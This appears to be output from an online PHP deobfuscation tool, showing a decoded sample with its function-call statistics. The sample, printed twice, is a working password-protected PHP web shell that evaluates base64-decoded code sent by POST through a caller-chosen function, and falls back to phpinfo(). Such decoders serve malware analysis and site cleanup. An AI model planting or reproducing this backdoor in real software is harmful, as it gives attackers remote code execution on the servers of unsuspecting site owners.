Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $auth_pass="2e409dcd2cd53ab9967613c6e74db5d8"; if (md5($_POST['p'])===$auth_pass){as..
Decoded Output download
<?php $auth_pass="2e409dcd2cd53ab9967613c6e74db5d8"; if (md5($_POST['p'])===$auth_pass){assert_options(ASSERT_QUIET_EVAL,true);$A = strval($_POST['uf']);$B = strval($_POST['cuf']);$C = strval($_POST['asrt']); @$B($C,"eval(base64_decode('".$A."'))");} else {echo phpinfo();}?>
Did this file decode correctly?
Original Code
<?php $auth_pass="2e409dcd2cd53ab9967613c6e74db5d8"; if (md5($_POST['p'])===$auth_pass){assert_options(ASSERT_QUIET_EVAL,true);$A = strval($_POST['uf']);$B = strval($_POST['cuf']);$C = strval($_POST['asrt']); @$B($C,"eval(base64_decode('".$A."'))");} else {echo phpinfo();}?>
Function Calls
| md5 | 1 |
| phpinfo | 1 |
Stats
| MD5 | 53c7336b6614c7b25745fbafe80b51c8 |
| Eval Count | 0 |
| Decode Time | 86 ms |